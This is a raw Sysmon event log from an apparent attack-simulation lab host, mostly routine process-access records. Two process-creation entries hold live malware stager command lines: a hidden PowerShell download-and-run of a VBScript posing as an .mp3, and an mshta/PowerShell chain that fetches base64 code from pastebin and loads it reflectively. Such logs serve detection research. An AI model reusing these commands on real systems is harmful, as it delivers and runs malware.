08:00:52.239{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106958Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.239{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106957Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.239{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B4B4-615A-4802-00000000FC01}7180C:\Windows\system32\PING.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106956Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.239{58E9C193-B4B4-615A-3F02-00000000FC01}1085112C:\Windows\System32\cmd.exe{58E9C193-B4B4-615A-4802-00000000FC01}7180C:\Windows\system32\PING.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\cmd.exe+f1e1|C:\Windows\System32\cmd.exe+11a37|C:\Windows\System32\cmd.exe+cb0d|C:\Windows\System32\cmd.exe+c295|C:\Windows\System32\cmd.exe+8564|C:\Windows\System32\cmd.exe+c347|C:\Windows\System32\cmd.exe+f916|C:\Windows\System32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106955Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.243{58E9C193-B4B4-615A-4802-00000000FC01}7180C:\Windows\System32\PING.EXE10.0.14393.0 (rs1_release.160715-1616)TCP/IP Ping CommandMicrosoft® Windows® Operating SystemMicrosoft Corporationping.exeping 127.0.0.1 -n 10 C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=7B647B55695ACE1E99158F79AB3AF51A,SHA256=ED7FA5B3CCBDD31A9E83F7C59F78AB5E2C83C7FEEDCC5F8B95948D11EBD7FF34,IMPHASH=5AAE2D3679223F82E19660D380B78FB5{58E9C193-B4B4-615A-3F02-00000000FC01}108C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/H2JdYYVV').replace('#$$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close) 10341000x8000000000000000106954Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.224{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B4B4-615A-3802-00000000FC01}6456C:\Windows\System32\WScript.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62890|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106953Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.224{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B4B4-615A-3802-00000000FC01}6456C:\Windows\System32\WScript.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+6284c|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106952Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.224{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B4B4-615A-3802-00000000FC01}6456C:\Windows\System32\WScript.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106951Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.224{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B4B4-615A-3802-00000000FC01}6456C:\Windows\System32\WScript.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106950Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.224{58E9C193-ACA7-615A-1100-00000000FC01}360684C:\Windows\system32\svchost.exe{58E9C193-B4B4-615A-4702-00000000FC01}1164C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106949Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.224{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B4B4-615A-4702-00000000FC01}1164C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000106948Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.224{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E395E5FD3A54DB2A4B911E316934E9F8,SHA256=A2356A1BB1169BCEDB1DE64E917227622FF09AE3CA87824A3B94F2E7ED5D9B2B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106947Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.208{58E9C193-B4B4-615A-4702-00000000FC01}11644524C:\Windows\system32\conhost.exe{58E9C193-B4B4-615A-4602-00000000FC01}7216C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106946Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.208{58E9C193-ACA7-615A-1100-00000000FC01}360684C:\Windows\system32\svchost.exe{58E9C193-B4B4-615A-4502-00000000FC01}6612C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106945Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.208{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B4B4-615A-4502-00000000FC01}6612C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106944Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.192{58E9C193-AE62-615A-B200-00000000FC01}32123188C:\Windows\system32\csrss.exe{58E9C193-B4B4-615A-4702-00000000FC01}1164C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106943Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.192{58E9C193-B4B4-615A-4502-00000000FC01}66121160C:\Windows\system32\conhost.exe{58E9C193-B4B4-615A-4402-00000000FC01}5708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106942Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.177{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106941Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.177{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106940Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.177{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106939Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.177{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106938Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.177{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B4B4-615A-4602-00000000FC01}7216C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106937Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.177{58E9C193-B4B4-615A-3802-00000000FC01}64568040C:\Windows\System32\WScript.exe{58E9C193-B4B4-615A-4602-00000000FC01}7216C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\SHELL32.dll+3ccff|C:\Windows\System32\SHELL32.dll+3cb8c|C:\Windows\System32\SHELL32.dll+dcb2e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000106936Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.184{58E9C193-B4B4-615A-4602-00000000FC01}7216C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://libya2020.com.ly/google0rvi.mp3','C:\Users\ADMINI~1\AppData\Local\Temp\HsUCsYfsgsd5Q1.vbs');Start-Process 'C:\Users\ADMINI~1\AppData\Local\Temp\HsUCsYfsgsd5Q1.vbs'C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{58E9C193-B4B4-615A-3802-00000000FC01}6456C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\_______ _____ ___ ______ ______.vbs" 10341000x8000000000000000106935Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.177{58E9C193-ACA7-615A-1100-00000000FC01}360684C:\Windows\system32\svchost.exe{58E9C193-B4B4-615A-4302-00000000FC01}5984C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106934Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.177{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B4B4-615A-4302-00000000FC01}5984C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106933Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.177{58E9C193-AE62-615A-B200-00000000FC01}32123188C:\Windows\system32\csrss.exe{58E9C193-B4B4-615A-4502-00000000FC01}6612C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106932Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.174{58E9C193-B4B4-615A-4302-00000000FC01}59844336C:\Windows\system32\conhost.exe{58E9C193-B4B4-615A-4202-00000000FC01}4012C:\Windows\System32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000106931Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.174{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01BBD9A337E9A28BA36E00F7D77CF3B6,SHA256=418C977FE551305351AFE5747D1E30298F854810C46A87F026333E299495AC48,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000106930Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.155{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B4B4-615A-4402-00000000FC01}5708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000106929Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.155{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106928Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.155{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106927Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.155{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106926Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:00:52.155{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000106925Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 